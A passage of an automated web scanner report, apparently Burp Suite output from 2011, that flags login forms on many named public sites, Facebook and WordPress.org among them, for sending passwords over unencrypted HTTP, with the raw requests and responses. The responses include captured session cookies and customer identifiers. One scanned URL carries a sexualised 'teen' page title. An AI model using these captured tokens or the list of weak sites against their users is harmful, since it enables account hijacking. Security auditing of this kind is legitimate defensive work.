The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://slashdot.org/login.pl
The form contains the following password field:
  • upasswd

Request

GET /bookmark.pl?url={u}&title={t} HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.005001305
X-Leela: You did the best you could, I guess, and some of these gorillas are okay.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 23844
Date: Tue, 25 Jan 2011 13:16:10 GMT
X-Varnish: 2121089048
Age: 0
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script id="before-content" type="text/javascript">
var pageload = {
   pagemark: '12
...[SNIP]...
<div id="loginform">
                   <form action="//slashdot.org/login.pl" method="post">
<fieldset>
...[SNIP]...
<input type="hidden" name="op" value="userlogin">
   <input type="password" name="upasswd" size="20">
   <label class="checkbox">
...[SNIP]...

6.55. http://spongecell.com/event_list

Summary

Severity:   High
Confidence:   Certain
Host:   http://spongecell.com
Path:   /event_list

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://spongecell.com/promote/website/login
The form contains the following password field:
  • login[password]

Request

GET /event_list HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:18:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/
Status: 200 OK
Cache-Control: no-cache
Content-Length: 10097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<me
...[SNIP]...
<div class="column span-10 first last jsLoggedInHide" id="signIn">
<form action="/promote/website/login" id="signInForm" method="post">
<button class="" id="signInButton" style="" type="submit">
...[SNIP]...
<input class="formHelpText textField" formHelpText="email address" id="emailAddressTextField" name="login[name]" size="30" type="text" />
<input class="xformHelpText textField passwordField" formHelpText="password" id="passwordTextField" name="login[password]" size="30" type="password" />
<!-- - if flash[:note] -->
...[SNIP]...

6.56. http://themehybrid.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://themehybrid.com/blog/wp-login.php
The form contains the following password field:
  • pwd

Request

GET / HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.2.10.1295921862;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:20:45 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10979

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<div class="column column-2 column-log-in">
               <form class="log-in" action="http://themehybrid.com/blog/wp-login.php" method="post">
                   <p class="text-input">
...[SNIP]...
</label>
                       <input class="field" type="password" name="pwd" id="pwd" size="23" />
                   </p>
...[SNIP]...

6.57. http://themehybrid.com/themes/shadow

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /themes/shadow

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://themehybrid.com/blog/wp-login.php
The form contains the following password field:
  • pwd

Request

GET /themes/shadow HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:05:39 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=e59ccbea599b13d912fb7478431f66b7; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11457

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<div class="column column-2 column-log-in">
               <form class="log-in" action="http://themehybrid.com/blog/wp-login.php" method="post">
                   <p class="text-input">
...[SNIP]...
</label>
                       <input class="field" type="password" name="pwd" id="pwd" size="23" />
                   </p>
...[SNIP]...

6.58. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu

Summary

Severity:   High
Confidence:   Certain
Host:   http://venedet.michnica.net
Path:   /index.php/joomla/1-joomla-16-je-tu

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://venedet.michnica.net/index.php/component/comprofiler/login
The form contains the following password field:
  • passwd

Request

GET /index.php/joomla/1-joomla-16-je-tu HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:41 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: fa5a1b42d3949309610b52593e36fa6f=1841b8d77a50e80e7a37fed80c5175b4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17676


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sk-sk" lang="sk-sk" dir=
...[SNIP]...
</h3>
<form action="http://venedet.michnica.net/index.php/component/comprofiler/login" method="post" id="mod_loginform" style="margin:0px;">
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="mod_login">
...[SNIP]...
<span><input type="password" name="passwd" id="mod_login_password" class="inputbox" size="14" /></span>
...[SNIP]...

6.59. http://wordpress.org/extend/plugins/tweetmeme-follow-button/

Summary

Severity:   High
Confidence:   Certain
Host:   http://wordpress.org
Path:   /extend/plugins/tweetmeme-follow-button/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://wordpress.org/extend/plugins/bb-login.php
The form contains the following password field:
  • password

Request

GET /extend/plugins/tweetmeme-follow-button/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 14:03:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 20241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</h2>
       
       <form class="login" method="post" action="http://wordpress.org/extend/plugins/bb-login.php">
<p>
...[SNIP]...
<label>Password        <input class="text" name="password" type="password" id="password" size="13" maxlength="40" />
   </label>
...[SNIP]...

6.60. http://wordpress.org/extend/plugins/tweetmeme/

Summary

Severity:   High
Confidence:   Certain
Host:   http://wordpress.org
Path:   /extend/plugins/tweetmeme/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://wordpress.org/extend/plugins/bb-login.php
The form contains the following password field:
  • password

Request

GET /extend/plugins/tweetmeme/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 14:03:11 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 23579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</h2>
       
       <form class="login" method="post" action="http://wordpress.org/extend/plugins/bb-login.php">
<p>
...[SNIP]...
<label>Password        <input class="text" name="password" type="password" id="password" size="13" maxlength="40" />
   </label>
...[SNIP]...

6.61. http://wordpress.org/extend/plugins/wp-pagenavi/

Summary

Severity:   High
Confidence:   Certain
Host:   http://wordpress.org
Path:   /extend/plugins/wp-pagenavi/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://wordpress.org/extend/plugins/bb-login.php
The form contains the following password field:
  • password

Request

GET /extend/plugins/wp-pagenavi/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 23:11:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 23604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</h2>
       
       <form class="login" method="post" action="http://wordpress.org/extend/plugins/bb-login.php">
<p>
...[SNIP]...
<label>Password        <input class="text" name="password" type="password" id="password" size="13" maxlength="40" />
   </label>
...[SNIP]...

6.62. http://www.adside.com/adside/advertiser.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adside.com
Path:   /adside/advertiser.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.adside.com/adside/advertiser.html
The form contains the following password field:
  • password

Request

GET /adside/advertiser.html HTTP/1.1
Host: www.adside.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:23 GMT
ETag: W/"14556-1295025731000"
Last-Modified: Fri, 14 Jan 2011 17:22:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 14556
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>AdSide: Beyond St
...[SNIP]...
</div>
       <form method="post" action="" id="login" name="login">
           <input type="image" src="/img/button_signin.gif" id="signIn" name="signIn" value="Sign In" />
...[SNIP]...
</label><input type="password" name="password" id="password" tabindex="1" /></div>
...[SNIP]...

6.63. http://www.adside.com/adside/publisher.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adside.com
Path:   /adside/publisher.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.adside.com/adside/publisher.html
The form contains the following password field:
  • password

Request

GET /adside/publisher.html HTTP/1.1
Host: www.adside.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:22 GMT
ETag: W/"8990-1295025731000"
Last-Modified: Fri, 14 Jan 2011 17:22:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 8990
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>AdSide: Beyond St
...[SNIP]...
</div>
       <form method="post" action="" id="login" name="login">
           <input type="image" src="/img/button_signin.gif" id="signIn" name="signIn" value="Sign In" />
...[SNIP]...
</label><input type="password" name="password" id="password" tabindex="1" /></div>
...[SNIP]...

6.64. http://www.americascupmedia.com/index.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.americascupmedia.com/index.php
The form contains the following password field:
  • psw

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:26 GMT
Server: Apache
Set-Cookie: PHPSESSID=69ffa747e74ec3fc598608ba70c8ece5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 63617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...
<td colspan='2' class='typo_login' align='center'>
<form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '>
...[SNIP]...
<input name="login" id='login' type="text" class="form" >
psw&nbsp;<input name="psw" id='psw' type="password" class="form" >
<input type="button" class="form" value="ok"    name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'>
...[SNIP]...

6.65. http://www.barkerstores.com/soundings/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barkerstores.com
Path:   /soundings/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.barkerstores.com/soundings/Default.aspx
The form contains the following password field:
  • _ctl2:login:txtPassword

Request

GET /soundings/ HTTP/1.1
Host: www.barkerstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 14:24:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=etd10v55qnlha3bgxe4zk255; path=/
Set-Cookie: chk_support=check; path=/
Set-Cookie: SOU_CustID=SOU13989; path=/
Set-Cookie: SOU_CartID=SOU-9E35923E-12511; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26388


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Soundings Online Catalog</title>
       <meta name="GENERATOR" content="Microsoft Visual Studio.NET 7.0">
       <me
...[SNIP]...
<body>
       <form name="Form1" method="post" action="Default.aspx" id="Form1">
<input type="hidden" name="__EVENTTARGET" value="" />
...[SNIP]...
<BR>
                                       <input name="_ctl2:login:txtPassword" type="password" id="_ctl2_login_txtPassword" class="txBox" style="width:85px;" />
                                       </TD>
...[SNIP]...

6.66. http://www.dynamicdrive.com/forums/showthread.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dynamicdrive.com
Path:   /forums/showthread.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.dynamicdrive.com/forums/login.php?do=login
The form contains the following password field:
  • vb_login_password

Request

GET /forums/showthread.php HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:15 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: bbsessionhash=e29c1b7649b3da1e43c63d31de4eefad; path=/; HttpOnly
Set-Cookie: bblastvisit=1295913555; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=381">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

6.67. http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.eraser.ee
Path:   /uudised/joomla/329-joomla-16-on-saabunud.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.eraser.ee/uudised/joomla.html
The form contains the following password field:
  • passwd

Request

GET /uudised/joomla/329-joomla-16-on-saabunud.html HTTP/1.1
Host: www.eraser.ee
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2fa25d95fd31dc38873e1bc08d1d659=da81efe2eb9fa0e02e77a8fa6697e953; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-presets=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-bodylevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-cssstyle=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-linkcolor=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-family=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-size-is=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 16:04:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="et-ee" lang="et-ee" >
<he
...[SNIP]...
<div class="main-login-form">
<form action="/uudised/joomla.html" method="post" name="login" id="form-login" >
<h4>
...[SNIP]...
<br />
<input name="passwd" id="mod_login_password" type="password" class="inputbox png" value="Parool" alt="Parool" onblur="if(this.value=='') this.value='Parool';" onfocus="if(this.value=='Parool') this.value='';" size="26" alt="password" />
</div>
...[SNIP]...

6.68. http://www.facebook.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.facebook.com/
The form contains the following password field:
  • reg_passwd__

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=fYoRD; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:00 GMT
Content-Length: 30560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="912130b43b3ba6a45553142d27ed4396" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

6.69. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.heroturko.org
Path:   /n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22
The form contains the following password field:
  • login_password

Request

GET /n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22 HTTP/1.1
Host: www.heroturko.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 16:45:19 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=2636237a3d9a6cc753ecc8b5ac337b9c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: dle_user_id=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_password=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_hash=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Last-Modified: Mon, 24 Jan 2011 06:45:19 +0000 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 45000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><head>
<title>Nonude Young and Beauty Pretty Girl teen NN usenet binariesx22 H
...[SNIP]...
<div style="overflow: hidden; margin-bottom: 25px; padding-right: 15px;">
<form id="loginform" method="post" onsubmit="javascript:showBusyLayer()" action=''>

<input id="modlgn_username" type="text" name="login_name" class="inputbox" alt="username" size="18" onblur="if(this.value=='') this.value='username';" onfocus="if(this.value=='username')
...[SNIP]...
<br />
<input id="modlgn_passwd" type="password" name="login_password" class="inputbox" size="18" alt="password" onblur="if(this.value=='') this.value='password';" onfocus="if(this.value=='password') this.value='';" value="password" />

<div align="right">
...[SNIP]...

6.70. http://www.homes.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.homes.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.homes.com/
The form contains the following password field:
  • password

Request

GET / HTTP/1.1
Host: www.homes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:46:20 GMT
Set-Cookie: CFID=60949328;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Set-Cookie: CFTOKEN=33627566;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Set-Cookie: IS_MOBILE=false;domain=homes.com;expires=Tue, 25-Jan-2011 23:46:20 GMT;path=/
Set-Cookie: IS_MOBILE=false;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D60949328%26CFTOKEN%23%3D33627566%23lastvisit%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23hitcount%3D2%23cftoken%3D33627566%23cfid%3D60949328%23;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS4d7797=e908a900d531093072d6317c62f2667deb209ca39e7db0094d3e16c81399c6ee753c24c91beeb5004578232ed38192d33f299dc0d38192d33f299dc057e19d31bf3d0887; Path=/
Content-Length: 32451


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Homes.com - Ho
...[SNIP]...
</div>
   <form method="post" onsubmit="return false;">
<fieldset id="myHomesLoginForm" class="popupForm">
...[SNIP]...
</label>
       <input class="text" type="password" name="password" id="password" size="46" maxlength="112" value="" />
   </div>
...[SNIP]...

6.71. http://www.id-joomla.com/berita-joomla/648-joomla-16-telah-datang

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.id-joomla.com
Path:   /berita-joomla/648-joomla-16-telah-datang

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.id-joomla.com/component/comprofiler/login
The form contains the following password field:
  • passwd

Request

GET /berita-joomla/648-joomla-16-telah-datang HTTP/1.1
Host: www.id-joomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:45:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: 49291818acdf6a0853370bd89db83d1e=s0aevrt4jrilpgl4pva0tih570; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:45:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45105

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<div class="moduletable_inner"><form action="http://www.id-joomla.com/component/comprofiler/login" method="post" id="mod_loginform" style="margin:0px;">
